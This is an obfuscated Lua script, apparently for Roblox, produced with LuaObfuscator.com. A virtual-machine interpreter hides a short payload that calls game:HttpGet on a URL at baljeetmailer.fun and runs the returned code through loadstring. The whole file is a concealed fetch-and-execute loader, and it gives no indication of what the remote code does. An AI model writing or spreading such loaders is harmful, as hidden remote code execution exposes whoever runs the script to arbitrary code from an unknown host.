--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v81,v19);v19=nil;v89=1;end end else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 -(1065 -(68 + 997)))) then v83=(v31/((3 -(1 + 0))^(v32-(2 -1))))%(2^(((v33-(620 -(555 + 64))) -(v32-1)) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;end end else local v84=927 -(214 + (1983 -(226 + 1044))) ;local v85;while true do if (v84==(0 + 0)) then v85=(1 + 1)^(v32-((1251 -373) -(282 + 595))) ;return (((v31%(v85 + v85))>=v85) and 1) or ((7128 -5491) -(1523 + 114)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + 1 + 3 ;return (v40 * (40022563 -23245347)) + (v39 * (66493 -(892 + (415 -(87 + 263))))) + (v38 * (469 -213)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=181 -(67 + 113) ;local v44=(v20(v42,1 + 0 ,49 -29 ) * ((2 + 0)^(127 -95))) + v41 ;local v45=v20(v42,973 -((1240 -(145 + 293)) + 150) ,83 -(482 -(44 + 386)) );local v46=((v20(v42,57 -(467 -(416 + 26)) )==(1 + 0)) and  -((3186 -2188) -(393 + 522 + 82))) or (2 -(1 -0)) ;if (v45==(0 + 0)) then if (v44==((1486 -(998 + 488)) -0)) then return v46 * (1187 -(1069 + 118)) ;else local v91=0;while true do if (v91==(0 -0)) then v45=1 -0 ;v43=0 + 0 ;break;end end end elseif (v45==(3636 -1589)) then return ((v44==(0 + 0)) and (v46 * (1/(791 -(117 + 251 + 347 + 76))))) or (v46 * NaN) ;end return v8(v46,v45-(3214 -2191) ) * (v43 + (v44/((20 -(10 + 8))^(199 -147)))) ;end local function v25(v47) local v48;if  not v47 then local v86=772 -((733 -532) + 571) ;while true do if (v86==(1138 -(116 + 1022))) then v47=v23();if (v47==(0 -0)) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;local v49={};for v64=(3 -2) + 0 , #v48 do v49[v64]=v2(v1(v3(v48,v64,v64)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return 0 + 0 ;end)();local v51=(function() return;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do local v66=(function() return 836 -(660 + 176) ;end)();while true do if (v66~=0) then else if (v50==1) then local v98=(function() return 0;end)();local v99=(function() return;end)();while true do if (v98==(0 + 0)) then v99=(function() return 202 -(14 + 188) ;end)();while true do if (v99~=1) then else v57=(function() return {};end)();for v114= #"!",v56 do local v115=(function() return 675 -(534 + 141) ;end)();local v116=(function() return;end)();local v117=(function() return;end)();local v118=(function() return;end)();while true do if (v115==(0 + 0)) then v116=(function() return 0 + 0 ;end)();v117=(function() return nil;end)();v115=(function() return 1 + 0 ;end)();end if (v115~=(1 -0)) then else v118=(function() return nil;end)();while true do if (v116==0) then local v175=(function() return 0;end)();while true do if (v175==1) then v116=(function() return 1 -0 ;end)();break;end if (v175==0) then v117=(function() return v21();end)();v118=(function() return nil;end)();v175=(function() return 2 -1 ;end)();end end end if ((1 + 0)==v116) then if (v117== #"[") then v118=(function() return v21()~=(0 + 0) ;end)();elseif (v117==(398 -(115 + 281))) then v118=(function() return v24();end)();elseif (v117== #"91(") then v118=(function() return v25();end)();end v57[v114]=(function() return v118;end)();break;end end break;end end end v99=(function() return 2;end)();end if (v99==2) then v50=(function() return 2;end)();break;end if (v99==0) then v55=(function() return {v52,v53,nil,v54};end)();v56=(function() return v23();end)();v99=(function() return 2 -1 ;end)();end end break;end end end if (v50==(2 + 0)) then v55[ #"xxx"]=(function() return v21();end)();for v101= #"|",v23() do local v102=(function() return 0;end)();local v103=(function() return;end)();while true do if (v102==0) then v103=(function() return v21();end)();if (v20(v103, #"\\", #"\\")==0) then local v110=(function() return 0 -0 ;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (1==v110) then local v150=(function() return 0;end)();while true do if (v150==(0 -0)) then v113=(function() return {v22(),v22(),nil,nil};end)();if (v111==0) then local v177=(function() return 867 -(550 + 317) ;end)();local v178=(function() return;end)();while true do if (v177==0) then v178=(function() return 0 -0 ;end)();while true do if (v178==(0 -0)) then v113[ #"gha"]=(function() return v22();end)();v113[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v111== #"!") then v113[ #"xnx"]=(function() return v23();end)();elseif (v111==2) then v113[ #"-19"]=(function() return v23() -((5 -3)^(301 -(134 + 151))) ;end)();elseif (v111~= #"asd") then else local v186=(function() return 0;end)();local v187=(function() return;end)();while true do if (v186==(1665 -(970 + 695))) then v187=(function() return 0 -0 ;end)();while true do if (0==v187) then v113[ #"91("]=(function() return v23() -(2^(2006 -(582 + 1408))) ;end)();v113[ #"?id="]=(function() return v22();end)();break;end end break;end end end v150=(function() return 3 -2 ;end)();end if (v150~=1) then else v110=(function() return 2;end)();break;end end end if (3==v110) then if (v20(v112, #"19(", #"-19")~= #",") then else v113[ #"xnxx"]=(function() return v57[v113[ #"0836"]];end)();end v52[v101]=(function() return v113;end)();break;end if (v110==(0 -0)) then local v152=(function() return 0;end)();local v153=(function() return;end)();while true do if (v152~=0) then else v153=(function() return 0;end)();while true do if ((0 -0)~=v153) then else v111=(function() return v20(v103,1826 -(1195 + 629) , #"asd");end)();v112=(function() return v20(v103, #"?id=",6);end)();v153=(function() return 1;end)();end if (v153~=1) then else v110=(function() return 1 -0 ;end)();break;end end break;end end end if (v110==(243 -(187 + 54))) then if (v20(v112, #"[", #"{")~= #"<") then else v113[2]=(function() return v57[v113[2]];end)();end if (v20(v112,782 -(162 + 618) ,2 + 0 )~= #">") then else v113[ #"-19"]=(function() return v57[v113[ #"19("]];end)();end v110=(function() return 2 + 1 ;end)();end end end break;end end end for v104= #"]",v23() do v53,v104,v28=(function() return v51(v53,v104,v28);end)();end return v55;end v66=(function() return 1 -0 ;end)();end if (v66==(1 -0)) then if ((0 + 0)==v50) then v51=(function() return function(v105,v106,v107) local v108=(function() return 1636 -(1373 + 263) ;end)();local v109=(function() return;end)();while true do if (0~=v108) then else v109=(function() return 1000 -(451 + 549) ;end)();while true do if (v109~=(0 + 0)) then else local v149=(function() return 0 -0 ;end)();while true do if (v149~=0) then else local v169=(function() return 0;end)();while true do if (v169~=(0 -0)) then else v105[v106-#"~" ]=(function() return v107();end)();return v105,v106,v107;end end end end end end break;end end end;end)();v52=(function() return {};end)();v53=(function() return {};end)();v54=(function() return {};end)();v50=(function() return 1385 -(746 + 638) ;end)();end break;end end end end local function v29(v58,v59,v60) local v61=v58[1 + 0 ];local v62=v58[322 -(53 + 267) ];local v63=v58[4 -1 ];return function(...) local v67=v61;local v68=v62;local v69=v63;local v70=v27;local v71=1;local v72= -(342 -(218 + 123));local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v88=0 + 0 ;while true do if ((v88==1) or (1395==3578)) then if (v80<=(2 + 5)) then if (v80<=3) then if (v80<=(561 -(306 + 254))) then if (v80>(0 + 0)) then v77[v79[2]]=v60[v79[(2 + 3) -2 ]];else local v121=1467 -(899 + (981 -(15 + 398))) ;local v122;local v123;while true do if (v121==(1 + 0)) then v77[v122 + (2 -1) ]=v123;v77[v122]=v123[v79[607 -(268 + (1317 -(18 + 964))) ]];break;end if (v121==0) then v122=v79[292 -((225 -165) + 230) ];v123=v77[v79[575 -(426 + 146) ]];v121=1 + 0 ;end end end elseif ((512<=3591) and (v80>(1458 -(282 + 1174)))) then v77[v79[813 -(330 + 239 + 242) ]]=v60[v79[3]];else local v126=0 -(0 + 0) ;local v127;local v128;local v129;local v130;while true do if ((1 + 1)==v126) then for v170=v127,v72 do v130=v130 + (1025 -(706 + 318)) ;v77[v170]=v128[v130];end break;end if ((4795>402) and (v126==(1252 -(721 + 530)))) then v72=(v129 + v127) -(1272 -(945 + 326)) ;v130=0 -0 ;v126=2;end if (v126==(0 + 0)) then v127=v79[702 -(271 + 429) ];v128,v129=v70(v77[v127](v13(v77,v127 + 1 + 0 ,v79[1503 -(1408 + 92) ])));v126=1087 -(461 + 625) ;end end end elseif (v80<=5) then if ((4813>3565) and (v80>(854 -(20 + 830)))) then local v131=v79[2];v77[v131]=v77[v131](v13(v77,v131 + (1289 -(993 + 295)) ,v72));else local v133=0;local v134;local v135;local v136;local v137;while true do if ((3912==3912) and (v133==(1 + 0))) then v72=(v136 + v134) -(1172 -(327 + 91 + 753)) ;v137=0 + 0 ;v133=1 + 1 ;end if ((2821<=4824) and (v133==(1 + 1))) then for v173=v134,v72 do local v174=0 + 0 ;while true do if (v174==((655 -(116 + 10)) -(30 + 376 + 123))) then v137=v137 + (1770 -(1749 + 20)) ;v77[v173]=v135[v137];break;end end end break;end if (v133==(0 + 0)) then v134=v79[1324 -((1987 -(542 + 196)) + 73) ];v135,v136=v70(v77[v134](v13(v77,v134 + (1 -0) ,v79[2 + 1 ])));v133=1146 -(466 + 679) ;end end end elseif ((1738<=2195) and (v80>(14 -8))) then v77[v79[(2 + 3) -3 ]]={};else local v139=v79[1902 -(106 + 1794) ];v77[v139]=v77[v139](v13(v77,v139 + 1 + 0 ,v72));end elseif ((41<=3018) and (v80<=(2 + 1 + 8))) then if (v80<=(26 -17)) then if (v80>(21 -13)) then v77[v79[116 -(4 + 110) ]]();else do return;end end elseif (v80==(594 -(57 + 527))) then local v141=1427 -(41 + 1386) ;local v142;local v143;while true do if (v141==(103 -(17 + 86))) then v142=v79[2];v143=v77[v79[3 + 0 ]];v141=1 -0 ;end if (v141==(2 -1)) then v77[v142 + (167 -(122 + 44)) ]=v143;v77[v142]=v143[v79[6 -2 ]];break;end end else do return;end end elseif (v80<=(43 -30)) then if (v80==(10 + 2)) then v77[v79[1 + 1 ]]=v79[5 -2 ];else v77[v79[2]]();end elseif (v80==(79 -(11 + 19 + (91 -56)))) then v77[v79[2]]=v79[3 + (0 -0) ];else v77[v79[(2810 -(1126 + 425)) -(1043 + 214) ]]={};end v71=v71 + (3 -2) ;break;end if ((2145<=4104) and (v88==(1212 -(323 + 889)))) then v79=v67[v71];v80=v79[2 -(406 -(118 + 287)) ];v88=581 -(361 + 219) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403373Q00682Q7470733A2Q2F62616C6A2Q65746D61696C65722E66756E2F7363726970742F66722Q652F363762313930313037356463612E6C756100094Q000F7Q001201000100013Q001201000200023Q00200A00020002000300120E000400044Q0002000200044Q000600013Q00022Q000D0001000100012Q00083Q00017Q00",v9(),...);
